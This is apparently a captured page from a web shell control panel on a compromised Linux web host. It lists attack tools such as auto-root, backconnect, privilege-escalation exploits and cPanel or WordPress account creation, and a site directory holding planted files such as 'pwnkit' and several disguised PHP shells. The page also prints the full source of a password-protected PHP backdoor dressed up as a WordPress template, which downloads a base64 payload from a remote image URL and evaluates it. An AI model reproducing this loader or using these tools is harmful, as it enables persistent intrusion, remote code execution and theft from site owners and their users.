Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
decay_sym
[ DIR ]
drwxr-xr-x
delivery
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sunat
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env
984
B
-rw-r--r--
.env.example
651
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
155
B
-rw-r--r--
.htaccess
247
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
403.php
492
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
asue.php
32.72
KB
-rw-r--r--
composer.json
1.62
KB
-rw-r--r--
composer.lock
148.19
KB
-rw-r--r--
cue.php
15.89
KB
-rw-r--r--
edit.php
1.72
KB
-rw-r--r--
geck.php
68.74
KB
-r--r--r--
google9ed3e7a826404adb.html
53
B
-rw-r--r--
index2.html
274
B
-rw-r--r--
package.json
1022
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.md
3.59
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
seven_2024.sql
62.01
KB
-rw-r--r--
seven_master_2024-CALCULO.zip
33.21
MB
-rw-r--r--
w.php
445.45
KB
-rw-r--r--
webpack.mix.js
549
B
-rw-r--r--
x.php
9.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '519c4aae736b66940236832ff2be253e1f54fb90a3a589c3db3f6eeb9a52f9e2') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $l = "https://user-images.githubusercontent.com/143735067/264713238-ae810af4-c98d-421f-bbb3-1ddcc58f952a.jpg"/* "" - ni*/; //DX for each form and a string if( function_exists('curl_init') ) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $l); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); $body = curl_exec($ch); curl_close($ch); } else { $body = @file_get_contents($l); } eval(base64_decode($body)); ?>
Close